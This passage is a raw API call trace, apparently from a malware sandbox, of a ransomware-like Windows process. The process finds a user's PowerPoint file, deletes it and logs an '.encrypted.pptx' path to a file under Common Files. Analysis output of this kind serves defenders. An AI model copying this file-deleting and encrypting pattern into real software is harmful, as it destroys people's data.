[0036.357] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.357] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0036.357] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.357] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.357] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.357] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.357] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.357] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.357] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.358] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx", lpFilePart=0x0) returned 0x44 [0036.358] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83fd62e0, ftCreationTime.dwHighDateTime=0x1d5be50, ftLastAccessTime.dwLowDateTime=0xd5dc2a40, ftLastAccessTime.dwHighDateTime=0x1d5beed, ftLastWriteTime.dwLowDateTime=0x1561a9a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xcab3, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="N-yzi.pptx", cAlternateFileName="N-YZI~1.PPT")) returned 0x7c2240 [0036.358] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\n-yzi.pptx")) returned 1 [0036.361] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83fd62e0, ftCreationTime.dwHighDateTime=0x1d5be50, ftLastAccessTime.dwLowDateTime=0xd5dc2a40, ftLastAccessTime.dwHighDateTime=0x1d5beed, ftLastWriteTime.dwLowDateTime=0x1561a9a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xcab3, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="N-yzi.pptx", cAlternateFileName="N-YZI~1.PPT")) returned 0 [0036.361] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0036.361] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.361] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0036.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0036.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0036.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0036.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0036.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.362] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.362] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0036.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.362] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0036.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.362] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0036.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0036.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.362] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0036.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0036.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.363] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.363] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.363] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.363] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0036.363] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.363] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0036.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.363] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0036.363] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x1e10, lpOverlapped=0x0) returned 1 [0036.364] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0036.364] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x1e10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.364] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0036.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.encrypted.pptx\r\n", cchWideChar=81, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81 [0036.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x51) returned 0x794b90 [0036.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.encrypted.pptx\r\n", cchWideChar=81, lpMultiByteStr=0x794b90, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.encrypted.pptx\r\n", lpUsedDefaultChar=0x0) returned 81 [0036.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0036.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0036.364] WriteFile (in: hFile=0x128, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x50, lpOverlapped=0x0) returned 1 [0036.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0036.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.364] CloseHandle (hObject=0x128) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0036.366] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0036.366] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.367] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0036.367] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.367] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.368] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0036.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5f8 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0036.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0036.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ad8 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0036.368] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0036.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0036.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0036.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0036.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0036.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0036.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 